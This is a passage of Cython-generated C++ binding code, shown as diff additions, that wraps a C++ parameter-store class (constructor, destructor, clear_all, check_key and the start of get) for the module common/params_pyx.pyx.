*__pyx_pf_6common_10params_pyx_ensure_bytes(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_v) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ensure_bytes", 0); + + /* "common/params_pyx.pyx":30 + * + * def ensure_bytes(v): + * return v.encode() if isinstance(v, str) else v; # <<<<<<<<<<<<<< + * + * class UnknownKeyName(Exception): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = PyUnicode_Check(__pyx_v_v); + if (__pyx_t_2) { + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_v_v, __pyx_n_s_encode); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 30, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 30, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + } else { + __Pyx_INCREF(__pyx_v_v); + __pyx_t_1 = __pyx_v_v; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/params_pyx.pyx":29 + * + * + * def ensure_bytes(v): # <<<<<<<<<<<<<< + * return v.encode() if isinstance(v, str) else v; + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("common.params_pyx.ensure_bytes", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":38 + * cdef c_Params* p + * + * def __cinit__(self, d=""): # <<<<<<<<<<<<<< + * cdef string path = d.encode() + * with nogil: + */ + +/* Python wrapper */ +static int __pyx_pw_6common_10params_pyx_6Params_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6common_10params_pyx_6Params_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_d = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_d,0}; + PyObject* values[1] = {0}; + values[0] = ((PyObject *)__pyx_kp_u_); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 38, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(0, 38, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_d = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 38, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params___cinit__(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_d); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_10params_pyx_6Params___cinit__(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_d) { + std::string __pyx_v_path; + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "common/params_pyx.pyx":39 + * + * def __cinit__(self, d=""): + * cdef string path = d.encode() # <<<<<<<<<<<<<< + * with nogil: + * self.p = new c_Params(path) + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_d, __pyx_n_s_encode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_3, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 39, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_path = ((std::string)__pyx_t_5); + + /* "common/params_pyx.pyx":40 + * def __cinit__(self, d=""): + * cdef string path = d.encode() + * with nogil: # <<<<<<<<<<<<<< + * self.p = new c_Params(path) + * + */ + { + #ifdef WITH_THREAD + PyThreadState *_save; + _save = NULL; + Py_UNBLOCK_THREADS + __Pyx_FastGIL_Remember(); + #endif + /*try:*/ { + + /* "common/params_pyx.pyx":41 + * cdef string path = d.encode() + * with nogil: + * self.p = new c_Params(path) # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __pyx_v_self->p = new Params(__pyx_v_path); + } + + /* "common/params_pyx.pyx":40 + * def __cinit__(self, d=""): + * cdef string path = d.encode() + * with nogil: # <<<<<<<<<<<<<< + * self.p = new c_Params(path) + * + */ + /*finally:*/ { + /*normal exit:*/{ + #ifdef WITH_THREAD + __Pyx_FastGIL_Forget(); + Py_BLOCK_THREADS + #endif + goto __pyx_L5; + } + __pyx_L5:; + } + } + + /* "common/params_pyx.pyx":38 + * cdef c_Params* p + * + * def __cinit__(self, d=""): # <<<<<<<<<<<<<< + * cdef string path = d.encode() + * with nogil: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":43 + * self.p = new c_Params(path) + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.p + * + */ + +/* Python wrapper */ +static void __pyx_pw_6common_10params_pyx_6Params_3__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6common_10params_pyx_6Params_3__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6common_10params_pyx_6Params_2__dealloc__(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6common_10params_pyx_6Params_2__dealloc__(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "common/params_pyx.pyx":44 + * + * def __dealloc__(self): + * del self.p # <<<<<<<<<<<<<< + * + * def clear_all(self, tx_type=ParamKeyType.ALL): + */ + delete __pyx_v_self->p; + + /* "common/params_pyx.pyx":43 + * self.p = new c_Params(path) + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.p + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "common/params_pyx.pyx":46 + * del self.p + * + * def clear_all(self, tx_type=ParamKeyType.ALL): # <<<<<<<<<<<<<< + * self.p.clearAll(tx_type) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_5clear_all(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_5clear_all = {"clear_all", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_5clear_all, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_5clear_all(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_tx_type = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("clear_all (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_tx_type,0}; + PyObject* values[1] = {0}; + values[0] = __pyx_k__4; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tx_type); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 46, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "clear_all") < 0)) __PYX_ERR(0, 46, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_tx_type = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("clear_all", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 46, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.clear_all", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_4clear_all(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_tx_type); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_4clear_all(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_tx_type) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + enum ParamKeyType __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("clear_all", 0); + + /* "common/params_pyx.pyx":47 + * + * def clear_all(self, tx_type=ParamKeyType.ALL): + * self.p.clearAll(tx_type) # <<<<<<<<<<<<<< + * + * def check_key(self, key): + */ + __pyx_t_1 = ((enum ParamKeyType)__Pyx_PyInt_As_enum__ParamKeyType(__pyx_v_tx_type)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 47, __pyx_L1_error) + __pyx_v_self->p->clearAll(__pyx_t_1); + + /* "common/params_pyx.pyx":46 + * del self.p + * + * def clear_all(self, tx_type=ParamKeyType.ALL): # <<<<<<<<<<<<<< + * self.p.clearAll(tx_type) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.params_pyx.Params.clear_all", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":49 + * self.p.clearAll(tx_type) + * + * def check_key(self, key): # <<<<<<<<<<<<<< + * key = ensure_bytes(key) + * if not self.p.checkKey(key): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_7check_key(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_7check_key = {"check_key", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_7check_key, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_7check_key(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("check_key (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 49, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "check_key") < 0)) __PYX_ERR(0, 49, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_key = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("check_key", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 49, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.check_key", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_6check_key(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_6check_key(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + std::string __pyx_t_5; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("check_key", 0); + __Pyx_INCREF(__pyx_v_key); + + /* "common/params_pyx.pyx":50 + * + * def check_key(self, key): + * key = ensure_bytes(key) # <<<<<<<<<<<<<< + * if not self.p.checkKey(key): + * raise UnknownKeyName(key) + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_ensure_bytes); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF_SET(__pyx_v_key, __pyx_t_1); + __pyx_t_1 = 0; + + /* "common/params_pyx.pyx":51 + * def check_key(self, key): + * key = ensure_bytes(key) + * if not self.p.checkKey(key): # <<<<<<<<<<<<<< + * raise UnknownKeyName(key) + * return key + */ + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_v_key); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 51, __pyx_L1_error) + __pyx_t_6 = (!(__pyx_v_self->p->checkKey(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_5)) != 0)); + if (unlikely(__pyx_t_6)) { + + /* "common/params_pyx.pyx":52 + * key = ensure_bytes(key) + * if not self.p.checkKey(key): + * raise UnknownKeyName(key) # <<<<<<<<<<<<<< + * return key + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_UnknownKeyName); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 52, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_key}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 52, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 52, __pyx_L1_error) + + /* "common/params_pyx.pyx":51 + * def check_key(self, key): + * key = ensure_bytes(key) + * if not self.p.checkKey(key): # <<<<<<<<<<<<<< + * raise UnknownKeyName(key) + * return key + */ + } + + /* "common/params_pyx.pyx":53 + * if not self.p.checkKey(key): + * raise UnknownKeyName(key) + * return key # <<<<<<<<<<<<<< + * + * def get(self, key, bool block=False, encoding=None): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_key); + __pyx_r = __pyx_v_key; + goto __pyx_L0; + + /* "common/params_pyx.pyx":49 + * self.p.clearAll(tx_type) + * + * def check_key(self, key): # <<<<<<<<<<<<<< + * key = ensure_bytes(key) + * if not self.p.checkKey(key): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.Params.check_key", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_key); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":55 + * return key + * + * def get(self, key, bool block=False, encoding=None): # <<<<<<<<<<<<<< + * cdef string k = self.check_key(key) + * cdef string val + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_6Params_9get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_6Params_9get = {"get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_6Params_9get, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_6Params_9get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + bool __pyx_v_block; + PyObject *__pyx_v_encoding = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,&__pyx_n_s_block,&__pyx_n_s_encoding,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)Py_None); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 55, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_block); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 55, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_encoding); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 55, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get") < 0)) __PYX_ERR(0, 55, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_key = values[0]; + if (values[1]) { + __pyx_v_block = __Pyx_PyObject_IsTrue(values[1]); if (unlikely((__pyx_v_block == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 55, __pyx_L3_error) + } else { + __pyx_v_block = ((bool)0); + } + __pyx_v_encoding = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get", 0, 1, 3, __pyx_nargs); __PYX_ERR(0, 55, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.Params.get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_8get(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v_key, __pyx_v_block, __pyx_v_encoding); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject 